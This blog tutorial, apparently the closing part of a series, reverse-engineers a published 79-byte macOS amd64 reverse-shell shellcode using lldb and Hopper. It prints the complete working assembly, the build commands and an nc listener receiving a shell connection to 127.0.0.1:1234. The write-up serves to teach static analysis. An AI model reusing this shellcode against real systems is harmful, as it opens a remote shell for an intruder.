Abstract
In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.
In the last article, we will put together what we have learnt so far and we will create a reverse bind shell
Keywords
reverse bind shell, socket, sys_dup2, execve, connect.
The code
We start with compiling the code from the well-known website:
bits 64
global _main
_main:
; 79 byte reverse shell
;
bits 64
mov rcx, ~0x0100007fd2040200
not rcx
push rcx
xor ebp, ebp
bts ebp, 25
; step 1, create a socket
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
push rbp
pop rax
cdq ; rdx=IPPROTO_IP
push 1
pop rsi ; rsi=SOCK_STREAM
push 2
pop rdi ; rdi=AF_INET
mov al, 97
syscall
xchg eax, edi ; edi=s
xchg eax, esi ; esi=2
; step 2, assign socket handle to stdin,stdout,stderr
; dup2(r, FILENO_STDIN)
; dup2(r, FILENO_STDOUT)
; dup2(r, FILENO_STDERR)
dup_loop64:
push rbp
pop rax ; eax = 0x02000000
mov al, 90 ; rax=sys_dup2
syscall
sub esi, 1
jns dup_loop64 ; jump if not signed
; step 3, connect to remote host
; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
push rbp
pop rax
push rsp
pop rsi
mov dl, 16 ; rdx=sizeof(sa)
mov al, 98 ; rax=sys_connect
syscall
; step 4, execute /bin/sh
; execve("/bin//sh", NULL, 0);
push rax
pop rsi
push rbp
pop rax
cdq ; rdx=0
mov rbx, '/bin//sh'
push rdx ; 0
push rbx ; "/bin//sh"
push rsp
pop rdi ; "/bin//sh", 0
mov al, 59 ; rax=sys_execve
syscall
Compiling this code is not different from the usual:
gbiondo@tripleX reverse connect shell % nasm -f macho64 rcs.asm
gbiondo@tripleX reverse connect shell % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem rcs.o -o reverseConnectShell
Now from another terminal we launch a netcat shell:
gbiondo@tripleX ~ % pwd
/Users/gbiondo
gbiondo@tripleX ~ % /usr/bin/nc -l 1234
...
And we launch the reverse shell:
gbiondo@ tripleX reverse connect shell % ./reverseConnectShell
On the first terminal, we can issue commands as if these were launched from the second shell:
gbiondo@tripleX ~ % /usr/bin/nc -l 1234
pwd
/Users/gbiondo/EXP312/Odzhan/reverse connect shell
It works fine.
It must be observed that if there is no shell to connect to, the given shellcode crashes with a segmentation fault.
This time we opt for another strategy to do the reverse engineering exercise. First, we collect all the launched syscalls, and we look through their documentation, if needed.
Last byte | syscall signature |
---|---|
97 | int socket(int domain, int type, int protocol); |
98 | int sys_dup2(u_int from, u_int to); |
90 | int connect(int s, caddr_t name, socklen_t namelen); |
59 | int execve(char *fname, char **argp, char **envp); |
The syscalls shouldn’t be new to the aficionados of this series – however, if you have lost the articles:
- We discussed
execve
in Come taste some shellcode... - We discussed
sys_dup2
in Binding a shell - We discussed
socket
in Binding a shell - We didn’t discuss
connect
yet
So the algorithm will be:
To save some time later, let's remember that according to the AMD calling convention, the registers shall contain the values as described below:
syscall | |||
---|---|---|---|
Registers | RDI |
RSI |
RDX |
socket |
domain |
type |
protocol |
sys_dup2 |
from |
to |
n/a |
connect |
Socket file descriptor | Address | Address length |
execve |
path | arguments | Global variables |
As I said in a previous article, when working with projects it’s always better to view both lldb and a visual disassembler. It gives a wide view of how the same result can be achieved in different manners. For instance, the original code:
mov rcx, ~0x0100007fd2040200
not rcx
has been disassembled by lldb as:
reverseConnectShell[0x100003f69] <+0>: movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not rcx
and by hopper as:
0000000100003f69 movabs rcx, 0xfeffff802dfbfdff
0000000100003f73 not rcx
Now, movabs
and mov
can be considered synonyms, in this context (see this link for more information), and yet the operands are different.
In the first case, the whole process has been already discussed in the article “Binding a shell”. We re-do this once more here:
This shows that the approach of the original code and the one of hopper are equivalent.
Negative numbers are obtained with 2's complement, so we have:
This finally proves that the three approaches are equivalent. As a point of interest, it’d have been way faster writing a simple piece of code:
#include <stdio.h>
int main() {
long myInt;
myInt = 0x100007fd2040201;
myInt *= -1;
printf("Original number made negative, in hex: %#lx\n",myInt);
return 0;
}
Or, damnit! you may use any scientific calculator that has programming features!
Now that we agree on the data, we can proceed with the analysis. For the sake of clarity, I am subdividing the code in chunks; the separators being the syscall instructions (and subsequent return value storing, if pertinent).
To make the things clearer, I will also show the contents of the registers and the stack.
First chunk: invoking socket
In other words, this is the main program until the loop. The disassembled code is:
(lldb) disassemble -n main
reverseConnectShell`main:
reverseConnectShell[0x100003f69] <+0>: movabs rcx, -0x100007fd2040201
reverseConnectShell[0x100003f73] <+10>: not rcx
reverseConnectShell[0x100003f76] <+13>: push rcx
reverseConnectShell[0x100003f77] <+14>: xor ebp, ebp
reverseConnectShell[0x100003f79] <+16>: bts ebp, 0x19
reverseConnectShell[0x100003f7d] <+20>: push rbp
reverseConnectShell[0x100003f7e] <+21>: pop rax
reverseConnectShell[0x100003f7f] <+22>: cdq
reverseConnectShell[0x100003f80] <+23>: push 0x1
reverseConnectShell[0x100003f82] <+25>: pop rsi
reverseConnectShell[0x100003f83] <+26>: push 0x2
reverseConnectShell[0x100003f85] <+28>: pop rdi
reverseConnectShell[0x100003f86] <+29>: mov al, 0x61
reverseConnectShell[0x100003f88] <+31>: syscall
reverseConnectShell[0x100003f8a] <+33>: xchg eax, edi
reverseConnectShell[0x100003f8b] <+34>: xchg eax, esi
We have already seen what happens in <+0>
. The effect of the operation <+10>
is simply flipping the bytes in RCX, this is put in the stack in <+13>
.
Let's observe the result of the not
, although the mechanism should be very clear by now:
What is this all about
We didn’t look at the man page of the connect instruction, taking it somehow for granted. Let’s do it now.
man 2 connect gives:
int connect(int socket, const struct sockaddr *address, socklen_t address_len);
DESCRIPTION The parameter socket is a socket. If it is of type
SOCK_DGRAM
, this call specifies the peer with which the socket is to be associated; this address is that to which datagrams are to be sent, and the only address from which datagrams are to be received. If the socket is of typeSOCK_STREAM
, this call attempts to make a connection to another socket. The other socket is specified by address, which is an address in the communications space of the socket. Each communications space interprets the address parameter in its own way. Generally, stream sockets may successfullyconnect()
only once; datagram sockets may useconnect()
multiple times to change their association. Datagram sockets may dissolve the association by callingdisconnectx(2)
, or by connecting to an invalid address, such as a null address or an address with the address family set toAF_UNSPEC
(the errorEAFNOSUPPORT
will be harmlessly returned).
Now, we have already seen a const struct sockaddr *address
passed to a syscall when we analysed bind. We have seen how to calculate the length, which is 16 bytes and how the fields are populated. Let’s get shortly back to that, remembering that the author wants to invoke connect with the parameters (sockfd, {AF_INET,1234,127.0.0.1}, 16)
. The first and the last should be immediate to understand, so we focus on the second one, namely {AF_INET,1234,127.0.0.1}
.
- The value of the constant
AF_INET
is0x02
. 1234
is an immediate constant. In hex that value is represented as0x04D2
.- The remaining,
127.0.0.1
, can be represented as0x7F 0x00 0x00 0x01
. - Finally, we know that a
const struct sockaddr *address
has an initial field,sin_len
, which is 1-byte long, and must be null:0x00
.
All these, taken altogether:
The piece of code prepares the contents that will be pointed after by *address
.
However, the situation before <+13>
is executed is:
and after its execution we have:
The next instruction (<+14>
) zeroes the contents of ebp
, which are the last 32 bits of rpb
– side effect of this action is zeroing also rbp
; and the one after (<+16>
) sets the 26th (0x19=26 – but also this should be clear by now) bit of the register to 1.
This prepares a 0x0000000002000000
value for the syscall without spawning null-bytes. Doing this makes a constant that is used during the preparations of the syscalls (do once and then use it!). In fact, the very next two operations store the value in the stack (<+20>
) and stores it into rax
(<+21>
).
The CDQ instruction (<+22>
) sets RDX
to 0, since eax
is signed positive.
The effect of the two instructions <+23>
and <+25>
is to store the value 1
into rsi
without generating null-bytes:
and similarly, with <+26>
and <+28>
the value 2
is stored into rdi
without generating null-bytes:
Finally, in <+29>
, the first syscall is prepared. The situation before and after the syscall is reported below, changes highlighted in red:
A new socket is created, and its value (3
) is stored into rax
.
The remaining two actions (namely, <+33>
and <+34>
) swap the contents of the two registers. At the end of the execution we have:
Time to look at the next chunk
dup_loop64
Note that the numeration restarts, but since there's no further label, the program will keep on using the internal numbering also after the jump instruction. This is actually meaningful, from the point of view of the assembly language - the humans must adapt to that :) But we won't surrender, and we'll stubbornly keep on subdividing into smaller chunks :)
reverseConnectShell[0x100003f8c] <+0>: push rbp
reverseConnectShell[0x100003f8d] <+1>: pop rax
reverseConnectShell[0x100003f8e] <+2>: mov al, 0x5a
reverseConnectShell[0x100003f90] <+4>: syscall
reverseConnectShell[0x100003f92] <+6>: sub esi, 0x1
reverseConnectShell[0x100003f95] <+9>: jns 0x100003f8c ; <+0>
At a glance, this routine is very easy to reverse: <+0>
, <+1>
, and <+2>
prepare the syscall (<+4>
) using the value of rsi
. The register rsi
initial value is 2
(STDERR
), then becomes 1
(STDOUT
), and finally becomes 0
which corresponds to STDIN
. Chiefly, this associates the socket file descriptor (rdi
, never changing) to the three aforementioned streams. In fact, at each iteration rsi
is decremented (<+6>
), and the jump is performed only upon non-negative results (<+9>
). Easy peasy.
We show a quick example of how the registers are impacted by this loop. The initial push and pop:
and the final ones:
When the loop terminates, the values of the registers is as follows:
This closes the dup_loop64 chunk.
Connect
This may seem the most tricky part of the whole exercise, because it really deals with the stack.
The code is:
reverseConnectShell[0x100003f97] <+11>: push rbp
reverseConnectShell[0x100003f98] <+12>: pop rax
reverseConnectShell[0x100003f99] <+13>: push rsp
reverseConnectShell[0x100003f9a] <+14>: pop rsi
reverseConnectShell[0x100003f9b] <+15>: mov dl, 0x10
reverseConnectShell[0x100003f9d] <+17>: mov al, 0x62
reverseConnectShell[0x100003f9f] <+19>: syscall
Let us focus on the contents of the stack, first. The stack pointer (rsp
) contains the value 0x00007FF7BFEFFA20
. At this location, the stack contains the previously built struct sockaddr
. By now, should be clear the effect of the instructions <+11>
and <+12>
: they basically prepare the syscall. After the execution of those instructions, the stack pointer still contains struct
's address. That address is then stored in rsi
with the usual push/pop mechanism, thus populating the value of the second parameter of the syscall. The third parameter must be stored in rdx
, whose last byte is set to 0x10
in <+15>
. Fianlly, rdi
, which contained the file descriptor of the socket, hasn't changed. The syscall is perfectioned in <+17>
and then invoked in <+19>
.
The final part is the execution of the shell, we have already analysed it in previous articles. Please, refer to them.
Conclusions
The aim of this series was multifold. First of all, I wanted to show that even with no assembly talent, we can understand shellcode (and we built some of that talent in this process, indeed!). I also wanted to show how to do static analysis. It's a lengthy process (the technical term is PitA), error-prone, but gives lots of satisfaction. Assembly is not that harsh monstrosity one expects it to be. It's not easy either, anyway, so you may want to build further skills on that. We have also seen some binary analysis.
... and all this, just by reverse engineering!